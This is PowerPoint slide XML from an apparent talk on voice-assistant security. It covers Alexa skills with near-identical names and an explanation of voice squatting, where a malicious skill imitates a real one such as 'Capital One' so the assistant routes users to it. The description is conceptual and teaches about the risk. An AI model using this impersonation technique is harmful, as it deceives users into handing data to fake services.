              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA516508-B14E-4797-BCD8-D04E5719A51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50936" y="2730847"/>
            <a:ext cx="7907081" cy="359472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02480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9CF664A5-5490-4425-8156-3F4009090781}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect b="11858"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1498488"/>
            <a:ext cx="12192000" cy="5388052"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>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27" name="TextBox 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48C890A7-3D36-40F6-8217-F60650A82FE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="799721" y="1902872"/>
            <a:ext cx="9515854" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>AI EQUIVALENT OF TYPO SQUATTING</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A.k.a. Voice Squatting and Voice Masquerading</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Cloud 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEB127E6-7A21-4ED3-B9F3-096D40C2CB72}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4773682" y="4088039"/>
            <a:ext cx="2779371" cy="1362078"/>
          </a:xfrm>
          <a:prstGeom prst="cloud">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="bg1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="bg1">
                  <a:lumMod val="95000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
          </a:gra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A62ECE2E-1491-4D0F-9C27-1F3EE72AAC9F}"/>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455488" y="3000285"/>
            <a:ext cx="2508601" cy="3196503"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Can 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E703A6A7-329F-4284-BBD1-EBB0893EBB86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2388519" y="5349675"/>
            <a:ext cx="1541758" cy="426010"/>
          </a:xfrm>
          <a:prstGeom prst="can">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="bg1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
          </a:gradFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:lumMod val="65000"/>
                <a:lumOff val="3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Can 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F9ED267-023D-422D-8732-53A995759053}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2388519" y="5230384"/>
            <a:ext cx="1541758" cy="257489"/>
          </a:xfrm>
          <a:prstGeom prst="can">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="bg1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
          </a:gradFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:lumMod val="65000"/>
                <a:lumOff val="3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Can 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FCDC1BD-F37D-44BB-ACCE-9DBD81ACA297}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2388519" y="5141152"/>
            <a:ext cx="1541758" cy="154782"/>
          </a:xfrm>
          <a:prstGeom prst="can">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="bg1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
          </a:gradFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:lumMod val="65000"/>
                <a:lumOff val="3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Can 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C934135-E665-4E13-8C93-C9EAE7931ED2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9726317" y="4039553"/>
            <a:ext cx="1541758" cy="1575343"/>
          </a:xfrm>
          <a:prstGeom prst="can">
            <a:avLst>
              <a:gd name="adj" fmla="val 9884"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="bg1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
          </a:gradFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:lumMod val="65000"/>
                <a:lumOff val="3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TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB2C4F1A-A946-4409-AB24-7F9C1EBF3DA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9528222" y="5835219"/>
            <a:ext cx="2934857" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Skills Store/Market</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8C0BC51-110A-4DDF-B832-688148FAA07C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1390985" y="6059751"/>
            <a:ext cx="3757548" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Virtual Personal Assistant</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="Straight Arrow Connector 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3F89BDC-EABA-468F-8C10-6AEEA592AF7E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2828925" y="4762883"/>
            <a:ext cx="1733550" cy="9142"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>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1" name="Straight Arrow Connector 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98A06BC3-540C-4A4E-9D86-2695E105A0E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7686675" y="4762883"/>
            <a:ext cx="1841547" cy="9142"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:headEnd type="triangle"/>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856440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Montserrat Ultra Light" charset="0"/>
                <a:ea typeface="Montserrat Ultra Light" charset="0"/>
                <a:cs typeface="Montserrat Ultra Light" charset="0"/>
              </a:rPr>
              <a:t>Seconds out! </a:t>
            </a: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22" name="TextBox 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F90482EA-11AB-45B2-A960-F3D84341E299}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="239383" y="3664749"/>
            <a:ext cx="189465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Introduction</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F459C4C6-1F71-403D-B96F-C44DA1491562}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8373640" y="4496328"/>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Getting to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grips</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88DA9458-EAEC-49CA-AA3F-4A72078E7BE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1880864" y="4564862"/>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Important terms</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1A53DCD-F9F0-47C0-97F7-6F7B9F18F70E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6757419" y="3693361"/>
            <a:ext cx="189465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The future</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE0921E7-76F1-4D13-8341-EB05A67723A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3520771" y="3669527"/>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The security problem</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9958980-F7ED-4E83-BF72-AB1D0F1F0B2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5156265" y="4511996"/>
            <a:ext cx="1894659" cy="25391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A tool, not a solution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75F7928E-6A9E-49B4-8DB1-85C5E02D51C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9996617" y="3712126"/>
            <a:ext cx="209692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Recommendations</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Picture 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5F91FFE-E199-43AC-AA42-A75EDEE9CF59}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-41832" y="1483614"/>
            <a:ext cx="12290852" cy="5616990"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="TextBox 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C42D479-2B4C-45DE-8D73-F07219BBC7C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6366788" y="2421921"/>
            <a:ext cx="5088901" cy="2154436"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>WHEN ENQUIRING ABOUT CATS GETS CONFUSING</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"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r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cats on the Alexa market place</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600"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pPr marL="285750" lvl="0" indent="-285750" defTabSz="914400">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>66 different Alexa skills are called cat facts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" defTabSz="914400">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>5 called cat fact</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" defTabSz="914400">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>11 whose invocation names contain the string “cat fact”, e.g. fun cat facts, funny cat facts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="34" name="Picture 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F363304E-8569-4802-BF57-645B7E52F6EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">
            <a:grayscl/>
          </a:blip>
          <a:srcRect l="15554" r="12763"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="948805" y="2091279"/>
            <a:ext cx="4736220" cy="4404771"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32201494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9CF664A5-5490-4425-8156-3F4009090781}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect b="11858"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1498488"/>
            <a:ext cx="12192000" cy="5388052"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>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27" name="TextBox 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48C890A7-3D36-40F6-8217-F60650A82FE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="799721" y="1902872"/>
            <a:ext cx="9515854" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>HERE IS A REAL WORLD EXAMPLE: WHEN BEING POLITE COSTS YOU...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01ADB35C-F716-42AA-BB9B-563E532F2E4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="719250" y="3057279"/>
            <a:ext cx="4305975" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="1" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>	Voice Squatting:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" sz="1200" b="1" dirty="0">
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="723900" indent="-279400">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Adding a malicious skill to market place that impersonates another skill i.e. Captitol One or Please Capital One or Capital Won instead of valid skill Capital One </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="723900" indent="-279400">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>At present, the system is more likely to match malicious skill invoked by “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" i="1" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
